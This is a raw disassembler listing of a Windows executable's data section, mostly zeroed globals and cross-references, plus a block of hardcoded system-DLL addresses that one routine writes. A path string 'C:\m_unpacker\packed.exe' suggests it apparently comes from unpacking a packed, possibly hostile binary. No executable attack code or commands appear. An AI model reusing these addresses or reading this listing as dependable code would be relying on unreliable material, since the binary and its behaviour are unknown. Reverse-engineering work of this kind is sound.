dword_4E4258 dd 0 ; DATA XREF: sub_409E0C+112�w
dword_4E425C dd 1F7D886Ah ; DATA XREF: sub_409E0C+BE7�w
; sub_409E0C+C22�r
dword_4E4260 dd 71AB12F8h ; DATA XREF: sub_401CC7+2FF6�r
; sub_401CC7+60E8�r ...
dword_4E4264 dd 77C76551h ; DATA XREF: sub_409E0C+459�w
; sub_409E0C+4BB�r ...
dword_4E4268 dd 77C729E2h ; DATA XREF: sub_409E0C+49A�w
; sub_409E0C+4E3�r ...
dword_4E426C dd 77C7212Fh ; DATA XREF: sub_409E0C+466�w
; sub_409E0C+4C3�r ...
dword_4E4270 dd 71AB1AF4h ; DATA XREF: sub_401B4F+89�r
; sub_401CC7+5323�r ...
dword_4E4274 dd 77D5E303h ; DATA XREF: sub_409E0C+1A6�w
; sub_409E0C+1E2�r ...
dword_4E4278 dd 71C4576Ch ; DATA XREF: sub_409E0C+9F2�w
; sub_409E0C+A53�r ...
dword_4E427C dd 77D4702Fh ; DATA XREF: sub_409E0C+158�w
; sub_409E0C+1AD�r ...
dword_4E4280 dd 77E6C0E3h ; DATA XREF: sub_409E0C+8C�w
; sub_409E0C+E2�r ...
dword_4E4284 dd 71AB1ED3h ; DATA XREF: sub_409E0C+610�w
; sub_409E0C+764�r ...
dword_4E4288 dd 71B2A381h ; DATA XREF: sub_409E0C+B43�w
; sub_409E0C+B5F�r
dword_4E428C dd 77DDA595h ; DATA XREF: sub_409E0C+33A�w
; sub_41A556+55�r
dword_4E4290 dd 77DD22EAh ; DATA XREF: sub_409E0C+27E�w
; sub_409E0C+2D3�r ...
dword_4E4294 dd 773F97B0h ; DATA XREF: sub_409E0C+BAA�w
dword_4E4298 dd 76D67A29h ; DATA XREF: sub_409E0C+AEC�w
; sub_40AEC5+D4�r
dword_4E429C dd 76D674FAh ; DATA XREF: sub_409E0C+ADF�w
; sub_409E0C+AE6�r ...
dword_4E42A0 dd 71AB3C22h ; DATA XREF: sub_4019E7+A6�r
; sub_401CC7+5282�r ...
dword_4E42A4 dd 71AB2BBFh ; DATA XREF: sub_401CC7+5274�r
; sub_401CC7+7ACD�r ...
dword_4E42A8 dd 1F7BA3A9h ; DATA XREF: sub_409E0C+BF4�w
; sub_409E0C+C2F�r
dword_4E42AC dd 71AB401Ch ; DATA XREF: sub_401CC7+1E0E�r
; sub_401CC7+5C4F�r ...
dword_4E42B0 dd 71C214BAh ; DATA XREF: sub_409E0C+9B1�w
; sub_409E0C+A2B�r ...
dword_4E42B4 dd 71AB868Dh ; DATA XREF: sub_409E0C+65E�w
; sub_409E0C+794�r ...
dword_4E42B8 dd 71AB1A6Dh ; DATA XREF: sub_401317+12�r
; sub_4019E7+D0�r ...
dword_4E42BC dd 71AB155Ah ; DATA XREF: sub_409E0C+59B�w
; sub_409E0C+70C�r ...
dword_4E42C0 dd 71B22C25h ; DATA XREF: sub_409E0C+B36�w
; sub_409E0C+B57�r
dword_4E42C4 dd 71AB5A01h ; DATA XREF: sub_409E0C+540�w
; sub_409E0C+6C4�r ...
dword_4E42C8 dd 71B2ACCBh ; DATA XREF: sub_409E0C+B29�w
; sub_409E0C+B4A�r
dword_4E42CC dd 77E78C17h ; DATA XREF: WinMain(x,x,x,x)+52�r
; sub_409E0C+31�w ...
dword_4E42D0 dd 77D49A11h ; DATA XREF: sub_409E0C+17F�w
; sub_409E0C+1CA�r ...
align 8
dword_4E42D8 dd 76D62A37h ; DATA XREF: sub_409E0C+927�w
; sub_409E0C+93B�r ...
dword_4E42DC dd 77E6CBF9h ; DATA XREF: sub_409E0C+99�w
; sub_409E0C+EA�r ...
dword_4E42E0 dd 0 ; DATA XREF: sub_409E0C:loc_409F0A�w
; sub_409E0C+12B�w ...
dword_4E42E4 dd 0 ; DATA XREF: sub_409E0C+126�w
; sub_40AAC8+1C�r
dword_4E42E8 dd 0 ; DATA XREF: sub_409E0C:loc_409FFA�w
; sub_409E0C:loc_40A061�w ...
dword_4E42EC dd 0 ; DATA XREF: sub_409E0C+250�w
; sub_40AAC8+50�r
dword_4E42F0 dd 0 ; DATA XREF: WinMain(x,x,x,x)+349�r
; sub_401CC7+45E1�r ...
dword_4E42F4 dd 0 ; DATA XREF: sub_409E0C+41E�w
; sub_40AAC8+84�r
dword_4E42F8 dd 0 ; DATA XREF: sub_409E0C:loc_40A310�w
; sub_40AAC8:loc_40AB78�r
dword_4E42FC dd 0 ; DATA XREF: sub_409E0C+4FF�w
; sub_40AAC8+B8�r
dword_4E4300 dd 0 ; DATA XREF: sub_409E0C:loc_40A5E1�w
; sub_40AAC8:loc_40ABAC�r
dword_4E4304 dd 0 ; DATA XREF: sub_409E0C+7D0�w
; sub_40AAC8+EC�r
dword_4E4308 dd 0 ; DATA XREF: sub_409E0C:loc_40A6CC�w
; sub_409E0C+8EF�w ...
dword_4E430C dd 0 ; DATA XREF: sub_409E0C+8EA�w
; sub_40AAC8+120�r
dword_4E4310 dd 0 ; DATA XREF: sub_401CC7:loc_40725F�r
; sub_409E0C:loc_40A760�w ...
dword_4E4314 dd 0 ; DATA XREF: sub_409E0C+94F�w
; sub_40AAC8+154�r
dword_4E4318 dd 0 ; DATA XREF: sub_401CC7+45E9�r
; sub_409E0C:loc_40A87C�w ...
dword_4E431C dd 0 ; DATA XREF: sub_409E0C+A6B�w
; sub_40AAC8+188�r
dword_4E4320 dd 0 ; DATA XREF: sub_409E0C:loc_40A8C6�w
; sub_40AAC8:loc_40AC7C�r
dword_4E4324 dd 0 ; DATA XREF: sub_409E0C+AB5�w
; sub_40AAC8+1BC�r
dword_4E4328 dd 0 ; DATA XREF: sub_409E0C:loc_40A910�w
; sub_40AAC8:loc_40ACB0�r
dword_4E432C dd 0 ; DATA XREF: sub_409E0C+AFF�w
; sub_40AAC8+1F0�r
dword_4E4330 dd 0 ; DATA XREF: sub_409E0C:loc_40A984�w
; sub_40AAC8:loc_40ACE4�r
dword_4E4334 dd 0 ; DATA XREF: sub_409E0C+B73�w
; sub_40AAC8+224�r
dword_4E4338 dd 0 ; DATA XREF: sub_409E0C:loc_40A9CE�w
; sub_40AAC8:loc_40AD18�r
dword_4E433C dd 0 ; DATA XREF: sub_409E0C+BBD�w
; sub_40AAC8+258�r
dword_4E4340 dd 0 ; DATA XREF: sub_409E0C:loc_40AA6C�w
; sub_40AAC8:loc_40AD4C�r
dword_4E4344 dd 0 ; DATA XREF: sub_409E0C+C5B�w
; sub_40AAC8+28C�r
dword_4E4348 dd 0 ; DATA XREF: sub_409E0C:loc_40AAB6�w
; sub_40AAC8:loc_40AD80�r
dword_4E434C dd 0 ; DATA XREF: sub_409E0C+CA5�w
; sub_40AAC8+2C0�r
; char byte_4E4350[]
byte_4E4350 db 14h dup(0) ; DATA XREF: sub_40AFA9+32�o
dword_4E4364 dd 2 dup(0) ; DATA XREF: .text:0040AE04�o
dword_4E436C dd 0 ; DATA XREF: sub_40B2D5+12�o
dword_4E4370 dd 0 ; DATA XREF: sub_40B3DF+33�o
dword_4E4374 dd 0 ; DATA XREF: sub_40B3DF+63�o
byte_4E4378 db 0 ; DATA XREF: sub_40B687+6A�r
; sub_40B687+98�w
align 10h
dword_4E4380 dd 0 ; DATA XREF: sub_40C0EE+18�r
; sub_40C63B+9�o ...
dword_4E4384 dd 0 ; DATA XREF: sub_40C989+4D�r
; sub_40CBA1+D9�w ...
dd 73h dup(0)
db 2 dup(0)
word_4E4556 dw 0 ; DATA XREF: .data:00455B2C�o
dd 0BAh dup(0)
db 3 dup(0)
byte_4E4843 db 0 ; DATA XREF: .data:00455C9C�o
; .data:00455CDC�o ...
dd 40h dup(0)
db 2 dup(0)
word_4E4946 dw 0 ; DATA XREF: .data:0045580C�o
; .data:00455814�o
dd 181h dup(0)
db 2 dup(0)
word_4E4F4E dw 0 ; DATA XREF: .data:00455E7C�o
dd 0FDh dup(0)
db 0
byte_4E5345 db 3 dup(0) ; DATA XREF: .data:00455998�o
; .data:00455EE4�o
dd 40Eh dup(0)
dword_4E6380 dd 6 dup(0) ; DATA XREF: sub_40C989+D2�o
; sub_40C989+13B�o ...
dword_4E6398 dd 0 ; DATA XREF: sub_40C165+2C4�w
; sub_40C165+348�o
dword_4E639C dd 0 ; DATA XREF: sub_40C165+33E�w
; sub_40C165+35A�r
dword_4E63A0 dd 0 ; DATA XREF: sub_40C165+2CF�w
dword_4E63A4 dd 0 ; DATA XREF: sub_40C165+2B9�w
; sub_40C165:loc_40C47A�r
; char byte_4E63A8[]
byte_4E63A8 db 80h dup(0) ; DATA XREF: sub_40C165+2E2�o
; sub_40C165+302�o
dword_4E6428 dd 0 ; DATA XREF: sub_40C165+2D5�w
dword_4E642C dd 0 ; DATA XREF: sub_40C165+2EF�w
; sub_40C165+30F�w
dword_4E6430 dd 0 ; DATA XREF: sub_40C165:loc_40C4D5�r
align 8
dword_4E6438 dd 0 ; DATA XREF: sub_40C165+82�w
; sub_40C165+101�o
dword_4E643C dd 41h dup(0) ; DATA XREF: sub_40C165+41�o
; char byte_4E6540[]
byte_4E6540 db 104h dup(0) ; DATA XREF: sub_40C165+69�o
dword_4E6644 dd 0 ; DATA XREF: sub_40C165+F7�w
; sub_40C165+113�r
dword_4E6648 dd 0 ; DATA XREF: sub_40C165+52�w
dword_4E664C dd 0 ; DATA XREF: sub_40C165+4D�w
; sub_40C165+D4�r
; char byte_4E6650[]
byte_4E6650 db 80h dup(0) ; DATA XREF: sub_40C165+9A�o
; sub_40C165+BA�o
dword_4E66D0 dd 0 ; DATA XREF: sub_40C165+8F�w
dword_4E66D4 dd 0 ; DATA XREF: sub_40C165+A7�w
; sub_40C165+C7�w
dword_4E66D8 dd 0 ; DATA XREF: sub_40C165:loc_40C28E�r
align 10h
dword_4E66E0 dd 0 ; DATA XREF: sub_40C165+1A5�w
; sub_40C165+225�o
dword_4E66E4 dd 41h dup(0) ; DATA XREF: sub_40C165+167�o
; char byte_4E67E8[]
byte_4E67E8 db 104h dup(0) ; DATA XREF: sub_40C165+18C�o
dword_4E68EC dd 0 ; DATA XREF: sub_40C165+21B�w
; sub_40C165+237�r
dword_4E68F0 dd 0 ; DATA XREF: sub_40C165+17A�w
dword_4E68F4 dd 0 ; DATA XREF: sub_40C165+175�w
; sub_40C165+1F8�r
; char byte_4E68F8[]
byte_4E68F8 db 80h dup(0) ; DATA XREF: sub_40C165+1BE�o
; sub_40C165+1DE�o
dword_4E6978 dd 0 ; DATA XREF: sub_40C165+1B1�w
dword_4E697C dd 0 ; DATA XREF: sub_40C165+1CB�w
; sub_40C165+1EB�w
dword_4E6980 dd 0 ; DATA XREF: sub_40C165:loc_40C3B2�r
align 8
dword_4E6988 dd 0 ; DATA XREF: sub_40C165+417�w
; sub_40C165+470�o
; char byte_4E698C[]
byte_4E698C db 288h dup(0) ; DATA XREF: sub_40C165+405�o
; char byte_4E6C14[]
byte_4E6C14 db 104h dup(0) ; DATA XREF: sub_40C165+3CF�o
dword_4E6D18 dd 0 ; DATA XREF: sub_40C165+3FC�w
; sub_40C165+423�r
align 10h
dword_4E6D20 dd 0 ; DATA XREF: sub_40C165+466�w
; sub_40C165+482�r
dword_4E6D24 dd 0 ; DATA XREF: sub_40C165+429�w
dword_4E6D28 dd 0 ; DATA XREF: sub_40C165+436�w
dword_4E6D2C dd 0 ; DATA XREF: sub_40C165+3F6�w
dd 0
dword_4E6D34 dd 0 ; DATA XREF: sub_40C165:loc_40C5FD�r
dd 0
dword_4E6D3C dd 0 ; DATA XREF: sub_40BDB1+E�r
; sub_40BDB1+32�r ...
dword_4E6D40 dd 0 ; DATA XREF: sub_40BDB1+9�r
; sub_40BDB1+26�r ...
; char byte_4E6D44[]
byte_4E6D44 db 208h dup(0) ; DATA XREF: sub_40CE00+8D�o
dword_4E6F4C dd 2 dup(0) ; DATA XREF: sub_40D797+68�o
dword_4E6F54 dd 0 ; DATA XREF: sub_40D237+13�o
dword_4E6F58 dd 0 ; DATA XREF: sub_40DA86+10�o
dword_4E6F5C dd 2080Ah ; DATA XREF: sub_40E303+8�w
; sub_40E3FF+2D6�o
dd 0
dword_4E6F64 dd 0 ; DATA XREF: sub_40E3FF+64�o
dword_4E6F68 dd 0 ; DATA XREF: sub_40E3FF+69�o
dword_4E6F6C dd 3 dup(0) ; DATA XREF: sub_40E3FF+20C�o
dword_4E6F78 dd 0 ; DATA XREF: sub_40EC96+148�o
dword_4E6F7C dd 0 ; DATA XREF: sub_40EF61+1F�r
; sub_40EFAC+BC�o ...
dword_4E6F80 dd 0 ; DATA XREF: sub_40EFAC+B7�o
; sub_40EFAC+DA�r ...
dword_4E6F84 dd 0 ; DATA XREF: sub_40EFAC+9A�o
; sub_40EFAC+CF�r ...
dword_4E6F88 dd 0 ; DATA XREF: sub_40EF1E+35�r
; sub_40EFAC+95�o ...
dword_4E6F8C dd 0 ; DATA XREF: sub_40EF1E+17�r
; sub_40EF61+3D�r ...
dd 0
dword_4E6F94 dd 0D1C0h ; DATA XREF: sub_40C165+2AE�r
; sub_40F181+10�w ...
dd 0
dword_4E6F9C dd 0 ; DATA XREF: sub_40BE1D+1C�r
; sub_40F198+27C�w
dword_4E6FA0 dd 0 ; DATA XREF: sub_40FA71+2A�w
; sub_40FA71+51�r ...
align 10h
dword_4E6FB0 dd 3 dup(0) ; DATA XREF: sub_410B94+74�o
dword_4E6FBC dd 0 ; DATA XREF: sub_411278+146�r
dd 0
dword_4E6FC4 dd 2 dup(0) ; DATA XREF: sub_411278+139�o
byte_4E6FCC db 0 ; DATA XREF: sub_41224F+1EF�r
align 10h
dword_4E6FD0 dd 0 ; DATA XREF: sub_412E0A+4�w
; sub_412E0A+9�o
align 8
byte_4E6FD8 db 0 ; DATA XREF: sub_413956+1D3�w
; sub_413956+2D2�o
align 2
word_4E6FDA dw 0 ; DATA XREF: sub_413956+1E3�w
word_4E6FDC dw 0 ; DATA XREF: sub_413956+1E9�w
word_4E6FDE dw 0 ; DATA XREF: sub_413956+1F0�w
byte_4E6FE0 db 0 ; DATA XREF: sub_413956+1F7�w
byte_4E6FE1 db 0 ; DATA XREF: sub_413956+1FE�w
word_4E6FE2 dw 0 ; DATA XREF: sub_413956+204�w
dword_4E6FE4 dd 0 ; DATA XREF: sub_413956+234�w
; sub_413956+250�w
dword_4E6FE8 dd 0 ; DATA XREF: sub_413956+258�w
byte_4E6FEC db 0 ; DATA XREF: sub_413956+26A�w
byte_4E6FED db 0 ; DATA XREF: sub_413956+27D�w
word_4E6FEE dw 0 ; DATA XREF: sub_413956+295�w
word_4E6FF0 dw 0 ; DATA XREF: sub_413956+2A4�w
word_4E6FF2 dw 0 ; DATA XREF: sub_413956+29C�w
dword_4E6FF4 dd 101h dup(0) ; DATA XREF: sub_413956+2B9�o
; char byte_4E73F8[]
byte_4E73F8 db 200h dup(0) ; DATA XREF: sub_401CC7+2F7B�o
; sub_401CC7:loc_404CD0�o ...
byte_4E75F8 db 0 ; DATA XREF: sub_4151FE+1A1�w
; sub_4151FE+27A�o
align 2
word_4E75FA dw 0 ; DATA XREF: sub_4151FE+1AE�w
word_4E75FC dw 0 ; DATA XREF: sub_4151FE+1B8�w
word_4E75FE dw 0 ; DATA XREF: sub_4151FE+1C1�w
byte_4E7600 db 0 ; DATA XREF: sub_4151FE+1C8�w
byte_4E7601 db 0 ; DATA XREF: sub_4151FE+1CF�w
word_4E7602 dw 0 ; DATA XREF: sub_4151FE+1D6�w
dword_4E7604 dd 0 ; DATA XREF: sub_4151FE+1E3�w
dword_4E7608 dd 0 ; DATA XREF: sub_4151FE+1EB�w
word_4E760C dw 0 ; DATA XREF: sub_4151FE+244�w
word_4E760E dw 0 ; DATA XREF: sub_4151FE+22C�w
word_4E7610 dw 0 ; DATA XREF: sub_4151FE+256�w
word_4E7612 dw 0 ; DATA XREF: sub_4151FE+1F7�w
dword_4E7614 dd 101h dup(0) ; DATA XREF: sub_4151FE+265�o
dword_4E7A18 dd 0 ; DATA XREF: sub_401CC7+19DD�w
; sub_401CC7+2F73�r ...
dd 3 dup(0)
byte_4E7A28 db 0 ; DATA XREF: sub_4156E7+244�o
; sub_4156E7+253�w ...
byte_4E7A29 db 0 ; DATA XREF: sub_4156E7+267�w
word_4E7A2A dw 0 ; DATA XREF: sub_4156E7+298�w
word_4E7A2C dw 0 ; DATA XREF: sub_4156E7+27F�w
; sub_4156E7:loc_415AAD�w
word_4E7A2E dw 0 ; DATA XREF: sub_4156E7+29E�w
byte_4E7A30 db 0 ; DATA XREF: sub_4156E7+28B�w
byte_4E7A31 db 0 ; DATA XREF: sub_4156E7+260�w
word_4E7A32 dw 0 ; DATA XREF: sub_4156E7+3E6�w
; sub_4156E7+410�w
dword_4E7A34 dd 0 ; DATA XREF: sub_4156E7:loc_4159A4�w
; sub_4156E7+38E�r
dword_4E7A38 dd 0 ; DATA XREF: sub_4156E7+2CA�w
word_4E7A3C dw 0 ; DATA XREF: sub_4156E7+388�w
; sub_4156E7+3DC�o
word_4E7A3E dw 0 ; DATA XREF: sub_4156E7+329�w
; sub_4156E7+34E�r ...
dword_4E7A40 dd 0 ; DATA XREF: sub_4156E7+300�w
; sub_4156E7+3CD�w
dword_4E7A44 dd 0 ; DATA XREF: sub_4156E7+31C�w
; sub_4156E7+39F�w ...
byte_4E7A48 db 0 ; DATA XREF: sub_4156E7+305�r
; sub_4156E7+313�w
byte_4E7A49 db 0 ; DATA XREF: sub_4156E7+2CF�w
; sub_4156E7+398�w ...
word_4E7A4A dw 0 ; DATA XREF: sub_4156E7+2DD�w
word_4E7A4C dw 0 ; DATA XREF: sub_4156E7+3ED�w
; sub_4156E7+41E�w
word_4E7A4E dw 0 ; DATA XREF: sub_4156E7+322�w
word_4E7A50 dw 0 ; DATA XREF: sub_4156E7+354�w
; sub_4156E7+426�o
word_4E7A52 dw 0 ; DATA XREF: sub_4156E7+363�w
; sub_4156E7+3FD�w
dword_4E7A54 dd 0 ; DATA XREF: sub_4156E7+35D�w
align 10h
dword_4E7A60 dd 0 ; DATA XREF: sub_4156E7+393�w
; sub_4156E7+40B�o
dword_4E7A64 dd 0 ; DATA XREF: sub_4156E7+32F�w
byte_4E7A68 db 0 ; DATA XREF: sub_4156E7+335�w
byte_4E7A69 db 0 ; DATA XREF: sub_4156E7+33B�w
word_4E7A6A dw 0 ; DATA XREF: sub_4156E7+348�w
dword_4E7A6C dd 7 dup(0) ; DATA XREF: sub_4156E7+3E1�o
dword_4E7A88 dd 0 ; DATA XREF: sub_4156E7+30�w
; sub_4156E7+42F�r
; char byte_4E7A8C[]
byte_4E7A8C db 404h dup(0) ; DATA XREF: sub_4156E7+1C0�o
; sub_4156E7+472�o
; char byte_4E7E90[]
byte_4E7E90 db 4000h dup(0) ; DATA XREF: sub_415C77+1D�o
; .text:00415D61�o ...
; char byte_4EBE90[]
byte_4EBE90 db 4 dup(0) ; DATA XREF: sub_415C77+13�o
; .text:00415DA8�o ...
dword_4EBE94 dd 0 ; DATA XREF: sub_416191+F�r
; sub_41638A+12�r
align 10h
dword_4EBEA0 dd 0 ; DATA XREF: .data:0044E460�o
dword_4EBEA4 dd 0 ; DATA XREF: .data:0044E478�o
dword_4EBEA8 dd 0 ; DATA XREF: .data:0044E490�o
dword_4EBEAC dd 0 ; DATA XREF: .data:0044E4A8�o
dword_4EBEB0 dd 0 ; DATA XREF: .data:0044E4C0�o
dword_4EBEB4 dd 0 ; DATA XREF: .data:0044E4D8�o
dword_4EBEB8 dd 0 ; DATA XREF: .data:0044E4F0�o
dword_4EBEBC dd 0 ; DATA XREF: .data:0044E508�o
dword_4EBEC0 dd 0 ; DATA XREF: .data:0044E520�o
dword_4EBEC4 dd 0 ; DATA XREF: .data:0044E538�o
dword_4EBEC8 dd 0 ; DATA XREF: .data:0044E550�o
dword_4EBECC dd 0 ; DATA XREF: .data:0044E568�o
dword_4EBED0 dd 0 ; DATA XREF: .data:0044E580�o
dword_4EBED4 dd 0 ; DATA XREF: .data:0044E5B0�o
dword_4EBED8 dd 0 ; DATA XREF: .data:0044E5C8�o
dword_4EBEDC dd 0 ; DATA XREF: .data:0044E5E0�o
dword_4EBEE0 dd 0 ; DATA XREF: .data:0044E5F8�o
dword_4EBEE4 dd 0 ; DATA XREF: .data:0044E610�o
dword_4EBEE8 dd 0 ; DATA XREF: .data:0044E628�o
dword_4EBEEC dd 0 ; DATA XREF: .data:0044E640�o
dword_4EBEF0 dd 2 dup(0) ; DATA XREF: .data:0044E658�o
dword_4EBEF8 dd 2 dup(0) ; DATA XREF: sub_4167F7:loc_41688A�o
dword_4EBF00 dd 0 ; DATA XREF: sub_416F9A+431�o
dword_4EBF04 dd 0Eh dup(0) ; DATA XREF: sub_4174C3+F�o
; char byte_4EBF3C[]
byte_4EBF3C db 200h dup(0) ; DATA XREF: sub_418192+41�o
; wchar_t word_4EC13C
word_4EC13C dw 0 ; DATA XREF: sub_417AC3+C7�o
; sub_417E1E+DD�o ...
align 10h
dd 1FFh dup(0)
; wchar_t word_4EC93C
word_4EC93C dw 0 ; DATA XREF: sub_417AC3+D6�o
; sub_417E1E+F4�o ...
align 10h
dd 1FFh dup(0)
dword_4ED13C dd 0 ; DATA XREF: sub_417AC3+86�w
; sub_417C95+94�r
dword_4ED140 dd 0 ; DATA XREF: sub_417AC3+A7�w
; sub_4180FB+55�r ...
dword_4ED144 dd 0 ; DATA XREF: sub_417AC3+A0�w
; sub_417C95+D6�r ...
dword_4ED148 dd 0 ; DATA XREF: sub_417AC3+79�w
; sub_417C95+35�r ...
; char byte_4ED14C[]
byte_4ED14C db 200h dup(0) ; DATA XREF: sub_4180FB+5E�o
dword_4ED34C dd 0 ; DATA XREF: sub_417AC3+93�w
; sub_417C95+A2�r
dd 0
dword_4ED354 dd 0 ; DATA XREF: sub_417AC3+E7�o
; sub_417AC3+103�r ...
dword_4ED358 dd 0 ; DATA XREF: sub_417E1E+17B�w
; sub_417FC5+107�w
; void *Src
Src dd 0 ; DATA XREF: sub_417E1E+180�w
; sub_417FC5+10D�w ...
dword_4ED360 dd 0 ; DATA XREF: sub_417E1E+159�w
; sub_4180FB+4F�r
align 8
dword_4ED368 dd 0 ; DATA XREF: sub_418465+22�w
; sub_418465:loc_4185EA�w ...
dword_4ED36C dd 0 ; DATA XREF: sub_401CC7+3CF0�o
; sub_418331+12�o ...
dd 0
dword_4ED374 dd 0 ; DATA XREF: sub_418465+1C�r
; sub_41860A+3A�r
dd 7Fh dup(0)
dword_4ED574 dd 0 ; DATA XREF: sub_418465+28�r
; sub_41860A+4A�w
dd 1944h dup(0)
dword_4F3A88 dd 0 ; DATA XREF: sub_41860A+23�o
dword_4F3A8C dd 0 ; DATA XREF: sub_401CC7+3D14�o
; sub_418331+3C�o ...
dword_4F3A90 dd 0 ; DATA XREF: .data:00450354�o
dword_4F3A94 dd 0 ; DATA XREF: .data:0045035C�o
dword_4F3A98 dd 0 ; DATA XREF: .data:00450360�o
dword_4F3A9C dd 0 ; DATA XREF: .data:00450364�o
dword_4F3AA0 dd 0 ; DATA XREF: .data:00450368�o
dword_4F3AA4 dd 0 ; DATA XREF: .data:00450384�o
dword_4F3AA8 dd 0 ; DATA XREF: .data:0045038C�o
dword_4F3AAC dd 0 ; DATA XREF: .data:00450390�o
dword_4F3AB0 dd 0 ; DATA XREF: .data:0045039C�o
dword_4F3AB4 dd 0 ; DATA XREF: .data:004503A0�o
dword_4F3AB8 dd 0 ; DATA XREF: .data:004503A8�o
; char byte_4F3ABC[]
byte_4F3ABC db 204h dup(0) ; DATA XREF: sub_418E9D+6A�o
dword_4F3CC0 dd 0 ; DATA XREF: sub_41912E+E9�o
; char byte_4F3CC4[]
byte_4F3CC4 db 5Ch dup(0) ; DATA XREF: sub_4196E2:loc_4197FF�o
; sub_4196E2+131�o ...
; char byte_4F3D20[]
byte_4F3D20 db 200h dup(0) ; DATA XREF: sub_41A498+7C�o
; sub_41A498+A5�o
dword_4F3F20 dd 0 ; DATA XREF: sub_419A5D+45�w
; sub_419A5D+4D�r ...
; char byte_4F3F24[]
byte_4F3F24 db 5Ch dup(0) ; DATA XREF: sub_41A364:loc_41A486�o
; sub_41A364+12D�o
; char byte_4F3F80[]
byte_4F3F80 db 200h dup(0) ; DATA XREF: sub_41999D+4C�o
; sub_41999D+7E�o ...
byte_4F4180 db 0 ; DATA XREF: sub_419A5D+29�r
; sub_419A5D+34�w
align 4
; char byte_4F4184[]
byte_4F4184 db 200h dup(0) ; DATA XREF: sub_419CB4+61�o
; sub_419CB4+89�o ...
; char byte_4F4384[]
byte_4F4384 db 204h dup(0) ; DATA XREF: sub_4195C6:loc_4195FE�o
; sub_4195C6+5B�o
dword_4F4588 dd 0 ; DATA XREF: sub_41A939:loc_41A95A�r
; sub_41AA28+54�r ...
dword_4F458C dd 0 ; DATA XREF: sub_41A939�r
; sub_41AA28+37�r ...
dword_4F4590 dd 0 ; DATA XREF: sub_41A969+1A�r
; sub_41AB7D+83�o
dword_4F4594 dd 0 ; DATA XREF: sub_41A939:loc_41A94D�r
; sub_41AB7D+11B�w
; char byte_4F4598[]
byte_4F4598 db 34h dup(0) ; DATA XREF: sub_41AA28+13�o
; sub_41AB7D:loc_41ACBE�o
; int dword_4F45CC
dword_4F45CC dd 0 ; DATA XREF: sub_41AA28+CD�r
; sub_41AA28+EC�r ...
dd 0
; char byte_4F45D4[]
byte_4F45D4 db 4 dup(0) ; DATA XREF: sub_41A9A1+9�o
dword_4F45D8 dd 0 ; DATA XREF: sub_41AB7D+DF�o
; char byte_4F45DC[]
byte_4F45DC db 4 dup(0) ; DATA XREF: sub_41AB7D:loc_41ACB9�o
; char byte_4F45E0[]
byte_4F45E0 db 38h dup(0) ; DATA XREF: sub_41B7A7+47�o
dword_4F4618 dd 4 dup(0) ; DATA XREF: sub_41B964+13�o
dword_4F4628 dd 0 ; DATA XREF: .text:0041C173�o
dword_4F462C dd 0 ; DATA XREF: .text:0041C188�o
dword_4F4630 dd 0 ; DATA XREF: .text:0041C18F�o
dword_4F4634 dd 0 ; DATA XREF: .text:0041C1AB�o
dword_4F4638 dd 0 ; DATA XREF: .text:0041C1C0�o
dword_4F463C dd 2 dup(0) ; DATA XREF: .text:0041C1C7�o
; char byte_4F4644
byte_4F4644 db 0 ; DATA XREF: sub_41C5F5+6�o
; sub_41C76A+1E6�o ...
align 4
dd 3Fh dup(0)
word_4F4744 dw 0 ; DATA XREF: sub_41C624+2F�r
align 4
dword_4F4748 dd 2 dup(0) ; DATA XREF: sub_41C624+8�o
dword_4F4750 dd 2 dup(0) ; DATA XREF: sub_41C624+18�o
dword_4F4758 dd 2 dup(0) ; DATA XREF: sub_41C76A+29�o
dword_4F4760 dd 941E90h ; DATA XREF: __heap_alloc_dbg+262�w
; _realloc_help:loc_41D64B�r ...
dword_4F4764 dd 1545h ; DATA XREF: __heap_alloc_dbg:loc_41CFB3�r
; __heap_alloc_dbg+21C�w ...
dword_4F4768 dd 943230h ; DATA XREF: __heap_alloc_dbg:loc_41CFE9�r
; __heap_alloc_dbg+252�r ...
dword_4F476C dd 118Ah ; DATA XREF: __heap_alloc_dbg+222�r
; __heap_alloc_dbg+22A�w ...
dword_4F4770 dd 118Ah ; DATA XREF: __heap_alloc_dbg+235�r
; __heap_alloc_dbg+243�w ...
dword_4F4774 dd 0 ; DATA XREF: __sopen+217�r
dword_4F4778 dd 0A28h ; DATA XREF: sub_41E4D0:loc_41E53A�r
; sub_41E4D0:loc_41E5AD�r ...
dword_4F477C dd 501h ; DATA XREF: start+64�w
dword_4F4780 dd 5 ; DATA XREF: start+4F�w start+55�r
dword_4F4784 dd 1 ; DATA XREF: start+3E�w start+5E�r
dword_4F4788 dd 1 ; DATA XREF: WinMain(x,x,x,x):loc_401710�r
; __setargv+C6�w
dword_4F478C dd 942840h ; DATA XREF: WinMain(x,x,x,x)+2FE�r
; WinMain(x,x,x,x)+31E�r ...
dd 0
dword_4F4794 dd 942888h ; DATA XREF: __setenvp+7B�w
; __setenvp+81�r ...
dword_4F4798 dd 0 ; DATA XREF: ___crtsetenv+49�r
dword_4F479C dd 0 ; DATA XREF: _getenv+24�r
; ___wtomb_environ+6�r ...
dd 0
off_4F47A4 dd offset aCM_unpackerPac ; DATA XREF: __setargv+26�w
; __setargv+3C�r
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_4F47AC db 0 ; DATA XREF: _doexit+30�w
; ___endstdio+8�r
align 10h
dword_4F47B0 dd 0 ; DATA XREF: _doexit:loc_41F763�w
dword_4F47B4 dd 0 ; DATA XREF: _doexit+9�r
; _doexit:loc_41F80B�w
dword_4F47B8 dd 0 ; DATA XREF: _doexit+95�r _doexit+AF�w
dword_4F47BC dd 0 ; DATA XREF: .text:00420FE4�r
; .text:00420FEF�w
dword_4F47C0 dd 0 ; DATA XREF: __fpmath+10�w
align 8
dword_4F47C8 dd 0 ; DATA XREF: _time+88�r _time+F8�w
align 10h
dword_4F47D0 dd 0 ; DATA XREF: _time+7D�r _time+100�w ...
byte_4F47D4 db 2 dup(0) ; DATA XREF: _time+109�w
word_4F47D6 dw 0 ; DATA XREF: _time+52�r
dword_4F47D8 dd 0 ; DATA XREF: _time+3D�r _time+112�w ...
dword_4F47DC dd 0 ; DATA XREF: _time+11A�w
dword_4F47E0 dd 0 ; DATA XREF: start+C3�w __setenvp+1B�r ...
align 8
dword_4F47E8 dd 0 ; DATA XREF: __amsg_exit+3�r
; _fast_error_exit+3�r ...
dword_4F47EC dd 0 ; DATA XREF: __openfile:loc_4288B5�r
; __openfile+2CE�w ...
dword_4F47F0 dd 0 ; DATA XREF: __CrtDbgReport+93�r
; __CrtDbgReport+C8�w ...
dword_4F47F4 dd 0 ; DATA XREF: _malloc+A�r
; __malloc_dbg+10�r ...
